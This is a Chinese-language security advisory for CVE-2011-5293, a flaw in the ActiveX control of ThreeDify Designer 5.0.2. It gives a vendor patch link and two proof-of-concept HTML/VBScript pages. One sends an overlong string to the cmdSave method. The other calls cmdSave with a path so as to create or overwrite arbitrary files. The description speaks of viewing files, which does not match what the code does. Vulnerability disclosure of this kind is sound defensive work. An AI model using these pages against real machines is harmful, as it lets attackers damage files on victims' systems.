发布日期：2014-12-31
更新日期：2015-01-04

受影响系统：

ThreeDify Designer ThreeDify Designer 5.0.2

描述：

---

CVE(CAN) ID: CVE-2011-5293

ThreeDify Designer是直观的轻量级3D建模、查看及装配设计工具。

ThreeDify Designer 5.0.2版本存在安全漏洞，远程攻击者通过参数内的路径名，利用此漏洞可查看任意文件。此漏洞源于ActiveSolid.dll中ThreeDify.ThreeDifyDesigner.1 ActiveX控件在cmdSave方法的实现上。

<*来源：htbridge
  
  链接：https://www.htbridge.com/advisory/HTB23020
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<body>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target'></object>
<script language='vbscript'>
arg1=String(3000, "A")
target.cmdSave arg1
</script>
</body>
</html>


<html>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_create_or_to_overwrite"
target.cmdSave arg1
End Sub
</script>
</html>

建议：

---

厂商补丁：

ThreeDify Designer
------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.threedify.com/en/lightweight-3d/ms-office-add-ins/cad

浏览次数：2149
严重程度：0（网友投票）